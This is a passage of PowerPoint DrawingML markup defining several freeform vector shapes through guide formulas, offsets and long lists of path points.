                  <a:gd name="T23" fmla="*/ 237 h 495"/>
                  <a:gd name="T24" fmla="*/ 131 w 589"/>
                  <a:gd name="T25" fmla="*/ 253 h 495"/>
                  <a:gd name="T26" fmla="*/ 110 w 589"/>
                  <a:gd name="T27" fmla="*/ 289 h 495"/>
                  <a:gd name="T28" fmla="*/ 110 w 589"/>
                  <a:gd name="T29" fmla="*/ 305 h 495"/>
                  <a:gd name="T30" fmla="*/ 115 w 589"/>
                  <a:gd name="T31" fmla="*/ 326 h 495"/>
                  <a:gd name="T32" fmla="*/ 136 w 589"/>
                  <a:gd name="T33" fmla="*/ 352 h 495"/>
                  <a:gd name="T34" fmla="*/ 167 w 589"/>
                  <a:gd name="T35" fmla="*/ 363 h 495"/>
                  <a:gd name="T36" fmla="*/ 184 w 589"/>
                  <a:gd name="T37" fmla="*/ 363 h 495"/>
                  <a:gd name="T38" fmla="*/ 262 w 589"/>
                  <a:gd name="T39" fmla="*/ 337 h 495"/>
                  <a:gd name="T40" fmla="*/ 320 w 589"/>
                  <a:gd name="T41" fmla="*/ 462 h 495"/>
                  <a:gd name="T42" fmla="*/ 225 w 589"/>
                  <a:gd name="T43" fmla="*/ 489 h 495"/>
                  <a:gd name="T44" fmla="*/ 147 w 589"/>
                  <a:gd name="T45" fmla="*/ 489 h 495"/>
                  <a:gd name="T46" fmla="*/ 110 w 589"/>
                  <a:gd name="T47" fmla="*/ 473 h 495"/>
                  <a:gd name="T48" fmla="*/ 52 w 589"/>
                  <a:gd name="T49" fmla="*/ 410 h 495"/>
                  <a:gd name="T50" fmla="*/ 26 w 589"/>
                  <a:gd name="T51" fmla="*/ 363 h 495"/>
                  <a:gd name="T52" fmla="*/ 0 w 589"/>
                  <a:gd name="T53" fmla="*/ 268 h 495"/>
                  <a:gd name="T54" fmla="*/ 0 w 589"/>
                  <a:gd name="T55" fmla="*/ 226 h 495"/>
                  <a:gd name="T56" fmla="*/ 15 w 589"/>
                  <a:gd name="T57" fmla="*/ 190 h 495"/>
                  <a:gd name="T58" fmla="*/ 84 w 589"/>
                  <a:gd name="T59" fmla="*/ 116 h 495"/>
                  <a:gd name="T60" fmla="*/ 136 w 589"/>
                  <a:gd name="T61" fmla="*/ 79 h 495"/>
                  <a:gd name="T62" fmla="*/ 204 w 589"/>
                  <a:gd name="T63" fmla="*/ 47 h 495"/>
                  <a:gd name="T64" fmla="*/ 341 w 589"/>
                  <a:gd name="T65" fmla="*/ 0 h 495"/>
                  <a:gd name="T66" fmla="*/ 393 w 589"/>
                  <a:gd name="T67" fmla="*/ 0 h 495"/>
                  <a:gd name="T68" fmla="*/ 441 w 589"/>
                  <a:gd name="T69" fmla="*/ 6 h 495"/>
                  <a:gd name="T70" fmla="*/ 514 w 589"/>
                  <a:gd name="T71" fmla="*/ 53 h 495"/>
                  <a:gd name="T72" fmla="*/ 540 w 589"/>
                  <a:gd name="T73" fmla="*/ 90 h 495"/>
                  <a:gd name="T74" fmla="*/ 567 w 589"/>
                  <a:gd name="T75" fmla="*/ 132 h 495"/>
                  <a:gd name="T76" fmla="*/ 588 w 589"/>
                  <a:gd name="T77" fmla="*/ 216 h 495"/>
                  <a:gd name="T78" fmla="*/ 572 w 589"/>
                  <a:gd name="T79" fmla="*/ 294 h 495"/>
                  <a:gd name="T80" fmla="*/ 556 w 589"/>
                  <a:gd name="T81" fmla="*/ 326 h 495"/>
                  <a:gd name="T82" fmla="*/ 493 w 589"/>
                  <a:gd name="T83" fmla="*/ 378 h 495"/>
                  <a:gd name="T84" fmla="*/ 393 w 589"/>
                  <a:gd name="T85" fmla="*/ 279 h 495"/>
                  <a:gd name="T86" fmla="*/ 430 w 589"/>
                  <a:gd name="T87" fmla="*/ 258 h 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589" h="495">
                    <a:moveTo>
                      <a:pt x="430" y="258"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="430" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="258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3" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7337425" y="2811463"/>
                <a:ext cx="231775" cy="214312"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 136 w 646"/>
                  <a:gd name="T1" fmla="*/ 441 h 595"/>
                  <a:gd name="T2" fmla="*/ 136 w 646"/>
                  <a:gd name="T3" fmla="*/ 441 h 595"/>
                  <a:gd name="T4" fmla="*/ 94 w 646"/>
                  <a:gd name="T5" fmla="*/ 426 h 595"/>
                  <a:gd name="T6" fmla="*/ 73 w 646"/>
                  <a:gd name="T7" fmla="*/ 415 h 595"/>
                  <a:gd name="T8" fmla="*/ 58 w 646"/>
                  <a:gd name="T9" fmla="*/ 404 h 595"/>
                  <a:gd name="T10" fmla="*/ 58 w 646"/>
                  <a:gd name="T11" fmla="*/ 404 h 595"/>
                  <a:gd name="T12" fmla="*/ 31 w 646"/>
                  <a:gd name="T13" fmla="*/ 373 h 595"/>
                  <a:gd name="T14" fmla="*/ 15 w 646"/>
                  <a:gd name="T15" fmla="*/ 331 h 595"/>
                  <a:gd name="T16" fmla="*/ 15 w 646"/>
                  <a:gd name="T17" fmla="*/ 331 h 595"/>
                  <a:gd name="T18" fmla="*/ 5 w 646"/>
                  <a:gd name="T19" fmla="*/ 300 h 595"/>
                  <a:gd name="T20" fmla="*/ 0 w 646"/>
                  <a:gd name="T21" fmla="*/ 273 h 595"/>
                  <a:gd name="T22" fmla="*/ 5 w 646"/>
                  <a:gd name="T23" fmla="*/ 247 h 595"/>
                  <a:gd name="T24" fmla="*/ 11 w 646"/>
                  <a:gd name="T25" fmla="*/ 221 h 595"/>
                  <a:gd name="T26" fmla="*/ 11 w 646"/>
                  <a:gd name="T27" fmla="*/ 221 h 595"/>
                  <a:gd name="T28" fmla="*/ 26 w 646"/>
                  <a:gd name="T29" fmla="*/ 200 h 595"/>
                  <a:gd name="T30" fmla="*/ 47 w 646"/>
                  <a:gd name="T31" fmla="*/ 179 h 595"/>
                  <a:gd name="T32" fmla="*/ 73 w 646"/>
                  <a:gd name="T33" fmla="*/ 158 h 595"/>
                  <a:gd name="T34" fmla="*/ 110 w 646"/>
                  <a:gd name="T35" fmla="*/ 142 h 595"/>
                  <a:gd name="T36" fmla="*/ 499 w 646"/>
                  <a:gd name="T37" fmla="*/ 0 h 595"/>
                  <a:gd name="T38" fmla="*/ 551 w 646"/>
                  <a:gd name="T39" fmla="*/ 137 h 595"/>
                  <a:gd name="T40" fmla="*/ 189 w 646"/>
                  <a:gd name="T41" fmla="*/ 268 h 595"/>
                  <a:gd name="T42" fmla="*/ 189 w 646"/>
                  <a:gd name="T43" fmla="*/ 268 h 595"/>
                  <a:gd name="T44" fmla="*/ 158 w 646"/>
                  <a:gd name="T45" fmla="*/ 284 h 595"/>
                  <a:gd name="T46" fmla="*/ 136 w 646"/>
                  <a:gd name="T47" fmla="*/ 305 h 595"/>
                  <a:gd name="T48" fmla="*/ 136 w 646"/>
                  <a:gd name="T49" fmla="*/ 305 h 595"/>
                  <a:gd name="T50" fmla="*/ 131 w 646"/>
                  <a:gd name="T51" fmla="*/ 326 h 595"/>
                  <a:gd name="T52" fmla="*/ 136 w 646"/>
                  <a:gd name="T53" fmla="*/ 352 h 595"/>
                  <a:gd name="T54" fmla="*/ 136 w 646"/>
                  <a:gd name="T55" fmla="*/ 352 h 595"/>
                  <a:gd name="T56" fmla="*/ 141 w 646"/>
                  <a:gd name="T57" fmla="*/ 368 h 595"/>
                  <a:gd name="T58" fmla="*/ 152 w 646"/>
                  <a:gd name="T59" fmla="*/ 384 h 595"/>
                  <a:gd name="T60" fmla="*/ 162 w 646"/>
                  <a:gd name="T61" fmla="*/ 394 h 595"/>
                  <a:gd name="T62" fmla="*/ 178 w 646"/>
                  <a:gd name="T63" fmla="*/ 399 h 595"/>
                  <a:gd name="T64" fmla="*/ 194 w 646"/>
                  <a:gd name="T65" fmla="*/ 404 h 595"/>
                  <a:gd name="T66" fmla="*/ 210 w 646"/>
                  <a:gd name="T67" fmla="*/ 404 h 595"/>
                  <a:gd name="T68" fmla="*/ 252 w 646"/>
                  <a:gd name="T69" fmla="*/ 394 h 595"/>
                  <a:gd name="T70" fmla="*/ 598 w 646"/>
                  <a:gd name="T71" fmla="*/ 263 h 595"/>
                  <a:gd name="T72" fmla="*/ 645 w 646"/>
                  <a:gd name="T73" fmla="*/ 399 h 595"/>
                  <a:gd name="T74" fmla="*/ 121 w 646"/>
                  <a:gd name="T75" fmla="*/ 594 h 595"/>
                  <a:gd name="T76" fmla="*/ 73 w 646"/>
                  <a:gd name="T77" fmla="*/ 462 h 595"/>
                  <a:gd name="T78" fmla="*/ 136 w 646"/>
                  <a:gd name="T79" fmla="*/ 441 h 5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46" h="595">
                    <a:moveTo>
                      <a:pt x="136" y="441"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="136" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="441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4" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7389813" y="2998788"/>
                <a:ext cx="228600" cy="114300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 577 w 636"/>
                  <a:gd name="T1" fmla="*/ 131 h 316"/>
                  <a:gd name="T2" fmla="*/ 504 w 636"/>
                  <a:gd name="T3" fmla="*/ 152 h 316"/>
                  <a:gd name="T4" fmla="*/ 504 w 636"/>
                  <a:gd name="T5" fmla="*/ 152 h 316"/>
                  <a:gd name="T6" fmla="*/ 504 w 636"/>
                  <a:gd name="T7" fmla="*/ 152 h 316"/>
                  <a:gd name="T8" fmla="*/ 546 w 636"/>
                  <a:gd name="T9" fmla="*/ 168 h 316"/>
                  <a:gd name="T10" fmla="*/ 582 w 636"/>
                  <a:gd name="T11" fmla="*/ 184 h 316"/>
                  <a:gd name="T12" fmla="*/ 582 w 636"/>
                  <a:gd name="T13" fmla="*/ 184 h 316"/>
                  <a:gd name="T14" fmla="*/ 598 w 636"/>
                  <a:gd name="T15" fmla="*/ 200 h 316"/>
                  <a:gd name="T16" fmla="*/ 609 w 636"/>
                  <a:gd name="T17" fmla="*/ 215 h 316"/>
                  <a:gd name="T18" fmla="*/ 619 w 636"/>
                  <a:gd name="T19" fmla="*/ 231 h 316"/>
                  <a:gd name="T20" fmla="*/ 630 w 636"/>
                  <a:gd name="T21" fmla="*/ 252 h 316"/>
                  <a:gd name="T22" fmla="*/ 630 w 636"/>
                  <a:gd name="T23" fmla="*/ 252 h 316"/>
                  <a:gd name="T24" fmla="*/ 630 w 636"/>
                  <a:gd name="T25" fmla="*/ 262 h 316"/>
                  <a:gd name="T26" fmla="*/ 630 w 636"/>
                  <a:gd name="T27" fmla="*/ 262 h 316"/>
                  <a:gd name="T28" fmla="*/ 635 w 636"/>
                  <a:gd name="T29" fmla="*/ 278 h 316"/>
                  <a:gd name="T30" fmla="*/ 504 w 636"/>
                  <a:gd name="T31" fmla="*/ 315 h 316"/>
                  <a:gd name="T32" fmla="*/ 504 w 636"/>
                  <a:gd name="T33" fmla="*/ 315 h 316"/>
                  <a:gd name="T34" fmla="*/ 498 w 636"/>
                  <a:gd name="T35" fmla="*/ 294 h 316"/>
                  <a:gd name="T36" fmla="*/ 498 w 636"/>
                  <a:gd name="T37" fmla="*/ 294 h 316"/>
                  <a:gd name="T38" fmla="*/ 493 w 636"/>
                  <a:gd name="T39" fmla="*/ 273 h 316"/>
                  <a:gd name="T40" fmla="*/ 493 w 636"/>
                  <a:gd name="T41" fmla="*/ 273 h 316"/>
                  <a:gd name="T42" fmla="*/ 478 w 636"/>
                  <a:gd name="T43" fmla="*/ 236 h 316"/>
                  <a:gd name="T44" fmla="*/ 478 w 636"/>
                  <a:gd name="T45" fmla="*/ 236 h 316"/>
                  <a:gd name="T46" fmla="*/ 462 w 636"/>
                  <a:gd name="T47" fmla="*/ 221 h 316"/>
                  <a:gd name="T48" fmla="*/ 451 w 636"/>
                  <a:gd name="T49" fmla="*/ 210 h 316"/>
                  <a:gd name="T50" fmla="*/ 451 w 636"/>
                  <a:gd name="T51" fmla="*/ 210 h 316"/>
                  <a:gd name="T52" fmla="*/ 430 w 636"/>
                  <a:gd name="T53" fmla="*/ 200 h 316"/>
                  <a:gd name="T54" fmla="*/ 409 w 636"/>
                  <a:gd name="T55" fmla="*/ 194 h 316"/>
                  <a:gd name="T56" fmla="*/ 409 w 636"/>
                  <a:gd name="T57" fmla="*/ 194 h 316"/>
                  <a:gd name="T58" fmla="*/ 388 w 636"/>
                  <a:gd name="T59" fmla="*/ 194 h 316"/>
                  <a:gd name="T60" fmla="*/ 362 w 636"/>
                  <a:gd name="T61" fmla="*/ 200 h 316"/>
                  <a:gd name="T62" fmla="*/ 42 w 636"/>
                  <a:gd name="T63" fmla="*/ 294 h 316"/>
                  <a:gd name="T64" fmla="*/ 0 w 636"/>
                  <a:gd name="T65" fmla="*/ 157 h 316"/>
                  <a:gd name="T66" fmla="*/ 535 w 636"/>
                  <a:gd name="T67" fmla="*/ 0 h 316"/>
                  <a:gd name="T68" fmla="*/ 577 w 636"/>
                  <a:gd name="T69" fmla="*/ 131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36" h="316">
                    <a:moveTo>
                      <a:pt x="577" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="131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5" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7423150" y="3103563"/>
                <a:ext cx="274638" cy="117475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 578 w 763"/>
                  <a:gd name="T1" fmla="*/ 184 h 326"/>
                  <a:gd name="T2" fmla="*/ 37 w 763"/>
                  <a:gd name="T3" fmla="*/ 325 h 326"/>
                  <a:gd name="T4" fmla="*/ 0 w 763"/>
                  <a:gd name="T5" fmla="*/ 184 h 326"/>
                  <a:gd name="T6" fmla="*/ 541 w 763"/>
                  <a:gd name="T7" fmla="*/ 47 h 326"/>
                  <a:gd name="T8" fmla="*/ 578 w 763"/>
                  <a:gd name="T9" fmla="*/ 184 h 326"/>
                  <a:gd name="T10" fmla="*/ 762 w 763"/>
                  <a:gd name="T11" fmla="*/ 137 h 326"/>
                  <a:gd name="T12" fmla="*/ 646 w 763"/>
                  <a:gd name="T13" fmla="*/ 168 h 326"/>
                  <a:gd name="T14" fmla="*/ 609 w 763"/>
                  <a:gd name="T15" fmla="*/ 31 h 326"/>
                  <a:gd name="T16" fmla="*/ 725 w 763"/>
                  <a:gd name="T17" fmla="*/ 0 h 326"/>
                  <a:gd name="T18" fmla="*/ 762 w 763"/>
                  <a:gd name="T19" fmla="*/ 137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63" h="326">
                    <a:moveTo>
                      <a:pt x="578" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="184"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="762" y="137"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="646" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="137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6" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7451725" y="3198813"/>
                <a:ext cx="258763" cy="147637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 720"/>
                  <a:gd name="T1" fmla="*/ 179 h 411"/>
                  <a:gd name="T2" fmla="*/ 562 w 720"/>
                  <a:gd name="T3" fmla="*/ 210 h 411"/>
                  <a:gd name="T4" fmla="*/ 577 w 720"/>
                  <a:gd name="T5" fmla="*/ 294 h 411"/>
                  <a:gd name="T6" fmla="*/ 483 w 720"/>
                  <a:gd name="T7" fmla="*/ 310 h 411"/>
                  <a:gd name="T8" fmla="*/ 467 w 720"/>
                  <a:gd name="T9" fmla="*/ 232 h 411"/>
                  <a:gd name="T10" fmla="*/ 168 w 720"/>
                  <a:gd name="T11" fmla="*/ 294 h 411"/>
                  <a:gd name="T12" fmla="*/ 168 w 720"/>
                  <a:gd name="T13" fmla="*/ 294 h 411"/>
                  <a:gd name="T14" fmla="*/ 142 w 720"/>
                  <a:gd name="T15" fmla="*/ 300 h 411"/>
                  <a:gd name="T16" fmla="*/ 126 w 720"/>
                  <a:gd name="T17" fmla="*/ 316 h 411"/>
